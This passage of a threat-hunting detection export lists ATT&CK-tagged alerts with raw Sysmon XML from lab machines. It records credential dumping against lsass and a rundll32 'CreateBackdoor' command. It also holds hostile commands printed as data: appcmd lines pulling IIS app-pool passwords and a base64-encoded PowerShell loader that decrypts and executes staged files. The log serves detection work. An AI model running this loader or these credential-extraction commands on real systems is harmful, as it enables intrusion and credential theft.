<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-04-18T17:01:35.680716Z"">
</TimeCreated>
<EventRecordID>29</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3192"" ThreadID=""3288"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName"">technique_id=T1003,technique_name=Credential Dumping</Data>
<Data Name=""UtcTime"">2019-04-18 17:01:35.680</Data>
<Data Name=""ProcessGuid"">365ABB72-AC28-5CB8-0000-0010F3F70700</Data>
<Data Name=""ProcessId"">1200</Data>
<Data Name=""Image"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ImageLoaded"">C:\Windows\System32\vaultcli.dll</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Credential Vault Client Library</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""Hashes"">SHA1=9A398500E906FA979C21CD9F19C929FE798AF9EF,MD5=36B8D5903CEEF0AA42A1EE002BD27FF1,SHA256=CBD5C4D0E05B9A2657D816B655FFFC386807061594DEAABA754658D3152F7403,IMPHASH=55954B415EBB6BF5B592831A5E07DC56</Data>
<Data Name=""Signed"">true</Data>
<Data Name=""Signature"">Microsoft Windows</Data>
<Data Name=""SignatureStatus"">Valid</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1003] Processes opening handles and accessing Lsass with potential dlls in memory,1555606895.720774,2019-04-18T21:01:35.720774+04:00,,Threat,High,[T1003] Processes opening handles and accessing Lsass with potential dlls in memory,7,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>7</EventID>
<Version>3</Version>
<Level>4</Level>
<Task>7</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-04-18T17:01:35.680716Z"">
</TimeCreated>
<EventRecordID>29</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3192"" ThreadID=""3288"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName"">technique_id=T1003,technique_name=Credential Dumping</Data>
<Data Name=""UtcTime"">2019-04-18 17:01:35.680</Data>
<Data Name=""ProcessGuid"">365ABB72-AC28-5CB8-0000-0010F3F70700</Data>
<Data Name=""ProcessId"">1200</Data>
<Data Name=""Image"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ImageLoaded"">C:\Windows\System32\vaultcli.dll</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Credential Vault Client Library</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""Hashes"">SHA1=9A398500E906FA979C21CD9F19C929FE798AF9EF,MD5=36B8D5903CEEF0AA42A1EE002BD27FF1,SHA256=CBD5C4D0E05B9A2657D816B655FFFC386807061594DEAABA754658D3152F7403,IMPHASH=55954B415EBB6BF5B592831A5E07DC56</Data>
<Data Name=""Signed"">true</Data>
<Data Name=""Signature"">Microsoft Windows</Data>
<Data Name=""SignatureStatus"">Valid</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1558920557.731362,2019-05-27T05:29:17.731362+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( &quot;C:\Windows\System32\inetsrv\appcmd.exe&quot; list apppool &quot;Filename: redirection.config&quot; /text:processmodel.password ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-27T01:29:17.731362Z"">
</TimeCreated>
<EventRecordID>5898</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""324"" ThreadID=""2260"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-27 01:29:17.691</Data>
<Data Name=""ProcessGuid"">365ABB72-3D6D-5CEB-0000-00104474FF00</Data>
<Data Name=""ProcessId"">2448</Data>
<Data Name=""Image"">C:\Windows\System32\inetsrv\appcmd.exe</Data>
<Data Name=""FileVersion"">7.5.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Application Server Command Line Admin Tool</Data>
<Data Name=""Product"">Internet Information Services</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\inetsrv\appcmd.exe&quot; list apppool &quot;Filename: redirection.config&quot; /text:processmodel.password</Data>
<Data Name=""CurrentDirectory"">C:\Windows\Temp\</Data>
<Data Name=""User"">IIS APPPOOL\DefaultAppPool</Data>
<Data Name=""LogonGuid"">365ABB72-B26B-5CEA-0000-002023240800</Data>
<Data Name=""LogonId"">0x82423</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45</Data>
<Data Name=""ParentProcessGuid"">365ABB72-3D4A-5CEB-0000-0010FA93FD00</Data>
<Data Name=""ParentProcessId"">2584</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot; -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1003.001] Credential dump Thread Open to Lsass,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Critical,Process ( \\VBOXSVR\HTools\voice_mail.msg.exe) attempted to access lsass process ( C:\Windows\System32\lsass.exe),8,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>8</EventID>
<Version>2</Version>
<Level>4</Level>
<Task>8</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-04-30T12:43:43.784179Z"">
</TimeCreated>
<EventRecordID>9066</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1964"" ThreadID=""316"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-04-30 12:43:43.784</Data>
<Data Name=""SourceProcessGuid"">365ABB72-4055-5CC8-0000-0010769D0B00</Data>
<Data Name=""SourceProcessId"">1532</Data>
<Data Name=""SourceImage"">\\VBOXSVR\HTools\voice_mail.msg.exe</Data>
<Data Name=""TargetProcessGuid"">365ABB72-3FE0-5CC8-0000-00107E590000</Data>
<Data Name=""TargetProcessId"">492</Data>
<Data Name=""TargetImage"">C:\Windows\System32\lsass.exe</Data>
<Data Name=""NewThreadId"">3656</Data>
<Data Name=""StartAddress"">0x001A0000</Data>
<Data Name=""StartModule""></Data>
<Data Name=""StartFunction""></Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1117] Bypassing Application Whitelisting,1584766825.425419,2020-03-21T09:00:25.425419+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor)",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-03-21T05:00:25.421856Z"">
</TimeCreated>
<EventRecordID>243552</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2860"" ThreadID=""3508"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-03-21 05:00:25.397</Data>
<Data Name=""ProcessGuid"">747F3D96-9F69-5E75-0000-001033922000</Data>
<Data Name=""ProcessId"">6572</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
<Data Name=""CommandLine"">rundll32 windowscoredeviceinfo.dll,CreateBackdoor</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">747F3D96-9DBA-5E75-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
<Data Name=""ParentProcessGuid"">747F3D96-9DBC-5E75-0000-00102C390100</Data>
<Data Name=""ParentProcessId"">1652</Data>
<Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1584766825.425419,2020-03-21T09:00:25.425419+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-03-21T05:00:25.421856Z"">
</TimeCreated>
<EventRecordID>243552</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2860"" ThreadID=""3508"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-03-21 05:00:25.397</Data>
<Data Name=""ProcessGuid"">747F3D96-9F69-5E75-0000-001033922000</Data>
<Data Name=""ProcessId"">6572</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
<Data Name=""CommandLine"">rundll32 windowscoredeviceinfo.dll,CreateBackdoor</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">747F3D96-9DBA-5E75-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
<Data Name=""ParentProcessGuid"">747F3D96-9DBC-5E75-0000-00102C390100</Data>
<Data Name=""ParentProcessId"">1652</Data>
<Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1558920557.661261,2019-05-27T05:29:17.661261+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( &quot;C:\Windows\System32\inetsrv\appcmd.exe&quot; list apppool &quot;Filename: redirection.config&quot; /text:processmodel.username ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-27T01:29:17.661261Z"">
</TimeCreated>
<EventRecordID>5895</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""324"" ThreadID=""2260"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-27 01:29:17.621</Data>
<Data Name=""ProcessGuid"">365ABB72-3D6D-5CEB-0000-00108270FF00</Data>
<Data Name=""ProcessId"">1340</Data>
<Data Name=""Image"">C:\Windows\System32\inetsrv\appcmd.exe</Data>
<Data Name=""FileVersion"">7.5.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Application Server Command Line Admin Tool</Data>
<Data Name=""Product"">Internet Information Services</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\inetsrv\appcmd.exe&quot; list apppool &quot;Filename: redirection.config&quot; /text:processmodel.username</Data>
<Data Name=""CurrentDirectory"">C:\Windows\Temp\</Data>
<Data Name=""User"">IIS APPPOOL\DefaultAppPool</Data>
<Data Name=""LogonGuid"">365ABB72-B26B-5CEA-0000-002023240800</Data>
<Data Name=""LogonId"">0x82423</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45</Data>
<Data Name=""ParentProcessGuid"">365ABB72-3D4A-5CEB-0000-0010FA93FD00</Data>
<Data Name=""ParentProcessId"">2584</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot; -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1085] Rundll32 Execution detected,1584766825.425419,2020-03-21T09:00:25.425419+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-03-21T05:00:25.421856Z"">
</TimeCreated>
<EventRecordID>243552</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2860"" ThreadID=""3508"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-03-21 05:00:25.397</Data>
<Data Name=""ProcessGuid"">747F3D96-9F69-5E75-0000-001033922000</Data>
<Data Name=""ProcessId"">6572</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
<Data Name=""CommandLine"">rundll32 windowscoredeviceinfo.dll,CreateBackdoor</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">747F3D96-9DBA-5E75-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
<Data Name=""ParentProcessGuid"">747F3D96-9DBC-5E75-0000-00102C390100</Data>
<Data Name=""ParentProcessId"">1652</Data>
<Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[ T1003 ] Credential Dumping ImageLoad,1555606894.689291,2019-04-18T21:01:34.689291+04:00,,Threat,Medium,[ T1003 ] Credential Dumping ImageLoad,7,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
